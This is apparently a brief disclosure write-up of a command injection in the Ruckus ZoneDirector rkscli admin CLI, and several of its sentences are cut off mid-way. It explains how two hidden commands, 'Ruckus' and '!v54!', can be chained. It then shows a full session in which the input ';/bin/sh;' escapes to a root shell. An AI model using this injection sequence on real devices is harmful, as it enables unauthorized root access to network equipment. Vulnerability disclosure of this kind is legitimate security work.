This is a command injection vulnerability via a crafted CLI command with admin privilege.
/usr/bin/rkscli is a CLI used by Ruckus for user interaction and run commands by their web interface.
rkscli has a hidden CLI command
Ruckus that writes a limited string to
!v54! is another hidden command. If
!v54! do not receive any arguments it executes
/usr/sbin/sesame with that content of
Ruckus command can write a command injection payload into
!v54! can execute this payload and this way, escape to
Information about the exploitation of the vulnerability can be found in our 36C3 talk.
Jail breaking Ruckus CLI using this exploit
rkscli: Ruckus <-input ";/bin/sh;" grrrr rkscli: !v54! What's your chow: Ruckus Wireless ZoneDirector -- Command Line Interface Enter 'help' for a list of built-in commands. ruckus$ echo $USER root